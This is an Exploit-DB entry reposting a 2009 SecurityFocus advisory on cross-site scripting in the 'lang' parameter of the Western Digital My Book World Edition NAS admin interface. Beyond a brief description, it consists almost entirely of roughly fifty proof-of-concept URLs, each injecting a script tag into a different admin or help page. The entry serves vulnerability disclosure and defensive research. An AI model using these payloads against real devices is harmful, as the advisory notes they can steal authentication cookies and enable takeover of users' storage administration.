Western Digital My Book World Edition 1.1.16 - 'lang' Cross-Site Scripting

EDB-ID:

34083

CVE:

N/A


Author:

emgent

Type:

webapps


Platform:

PHP

Date:

2009-12-30


source: https://www.securityfocus.com/bid/40564/info

My Book World Edition is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

My Book World Edition 01.01.16 with MioNet 2.3.9.13 firmware is vulnerable; other versions may also be affected. 

http://www.example.com/admin/basic_index.php?lang=en"><script>alert(&#039;XSS&#039;);</script>
http://www.example.com/admin/system_config_manage.php?lang=en"><script>alert(&#039;XSS&#039;);</script>
http://www.example.com/admin/system_alerts.php?lang=en"><script>alert(&#039;XSS&#039;);</script>
http://www.example.com/admin/system_index.php?lang=en"><script>alert(&#039;XSS&#039;);</script>
http://www.example.com/admin/system_firmware_automated.php?lang=en"><script>alert(&#039;XSS&#039;);</script>
http://www.example.com/admin/system_firmware_manual.php?lang=en"><script>alert(&#039;XSS&#039;);</script>
http://www.example.com/admin/system_general.php?lang=en"><script>alert(&#039;XSS&#039;);</script>
http://www.example.com/admin/shutdown_reboot.php?lang=en"><script>alert(&#039;XSS&#039;);</script>
http://www.example.com/admin/shutdown_reboot.php?lang=en"><script>alert(&#039;XSS&#039;);</script>
http://www.example.com/admin/system_advanced.php?lang=en"><script>alert(&#039;XSS&#039;);</script>
http://www.example.com/admin/system_generate_ssl_form.php?lang=en"><script>alert(&#039;XSS&#039;);</script>
http://www.example.com/admin/network_index.php?lang=en"><script>alert(&#039;XSS&#039;);</script>
http://www.example.com/admin/network_lan.php?lang=en"><script>alert(&#039;XSS&#039;);</script>
http://www.example.com/admin/network_service.php?lang=en"><script>alert(&#039;XSS&#039;);</script>
http://www.example.com/admin/network_workgroup_domain.php?lang=en"><script>alert(&#039;XSS&#039;);</script>
http://www.example.com/admin/storage_index.php?lang=en"><script>alert(&#039;XSS&#039;);</script>
http://www.example.com/admin/storage_disk_manage.php?lang=en"><script>alert(&#039;XSS&#039;);</script>
http://www.example.com/admin/storage_volume_manage.php?lang=en"><script>alert(&#039;XSS&#039;);</script>
http://www.example.com/admin/storage_share_manage.php?lang=en"><script>alert(&#039;XSS&#039;);</script>
http://www.example.com/admin/storage_usb_manage.php?lang=en"><script>alert(&#039;XSS&#039;);</script>
http://www.example.com/admin/storage_quota_manage.php?lang=en"><script>alert(&#039;XSS&#039;);</script>
http://www.example.com/admin/storage_download_manage.php?lang=en"><script>alert(&#039;XSS&#039;);</script>
http://www.example.com/admin/system_change_btadmin_passwd.php?lang=en"><script>alert(&#039;XSS&#039;);</script>
http://www.example.com/admin/storage_share_add.php?lang=en"><script>alert(&#039;XSS&#039;);</script>
http://www.example.com/admin/storage_share_edit.php?share=user&volume=DataVolume&md=md2&lang=en"><script>alert(&#039;XSS&#039;);</script>
http://www.example.com/admin/media_index.php?lang=en"><script>alert(&#039;XSS&#039;);</script>
http://www.example.com/admin/itune_server_properties.php?lang=en"><script>alert(&#039;XSS&#039;);</script>
http://www.example.com/admin/access_control_index.php?lang=en"><script>alert(&#039;XSS&#039;);</script>
http://www.example.com/admin/access_control_shareaccess_manage.php?lang=en"><script>alert(&#039;XSS&#039;);</script>
http://www.example.com/admin/access_control_shareaccess_edit.php?id=1&lang=en"><script>alert(&#039;XSS&#039;);</script>
http://www.example.com/admin/status_index.php?lang=en"><script>alert(&#039;XSS&#039;);</script>
http://www.example.com/admin/index.php?lang=en"><script>alert(&#039;XSS&#039;);</script>
http://www.example.com/admin/status_log_system.php?lang=en"><script>alert(&#039;XSS&#039;);</script>
http://www.example.com/admin/status_log_cifs.php?lang=en"><script>alert(&#039;XSS&#039;);</script>
http://www.example.com/admin/status_log_ftp.php?lang=en"><script>alert(&#039;XSS&#039;);</script>
http://www.example.com/admin/status_log_setting.php?lang=en"><script>alert(&#039;XSS&#039;);</script>
http://www.example.com/admin/e_shutdown_reboot.php?lang=en"><script>alert(&#039;XSS&#039;);</script>
http://www.example.com/admin/e_machine.php?lang=en"><script>alert(&#039;XSS&#039;);</script>
http://www.example.com/admin/e_datetime.php?lang=en"><script>alert(&#039;XSS&#039;);</script>
http://www.example.com/admin/e_network.php?lang=en"><script>alert(&#039;XSS&#039;);</script>
http://www.example.com/admin/e_user_mgmt.php?lang=en"><script>alert(&#039;XSS&#039;);</script>
http://www.example.com/admin/e_user_change_passwd.php?id=2&lang=en"><script>alert(&#039;XSS&#039;);</script>
http://www.example.com/admin/e_user_mgmt.php?act=del&id=user&lang=en"><script>alert(&#039;XSS&#039;);</script>
http://www.example.com/admin/e_user_add.php?lang=en"><script>alert(&#039;XSS&#039;);</script>
http://www.example.com/admin/e_share_mgmt.php?lang=en"><script>alert(&#039;XSS&#039;);</script>
http://www.example.com/admin/e_share_mgmt.php?type=share&act=del&share=user&volume=DataVolume&md=md2&lang=en"><script>alert(&#039;XSS&#039;);</script>
http://www.example.com/admin/e_share_add.php?lang=en"><script>alert(&#039;XSS&#039;);</script>
http://www.example.com/admin/e_index.php?lang=en"><script>alert(&#039;XSS&#039;);</script>
http://www.example.com/admin/e_mionet.php?lang=en"><script>alert(&#039;XSS&#039;);</script>
http://www.example.com/admin/basic_index.php?action=logout&lang=en"><script>alert(&#039;XSS&#039;);</script>
http://www.example.com/help/system.php?lang=en"><script>alert(&#039;XSS&#039;);</script>&page=system_summary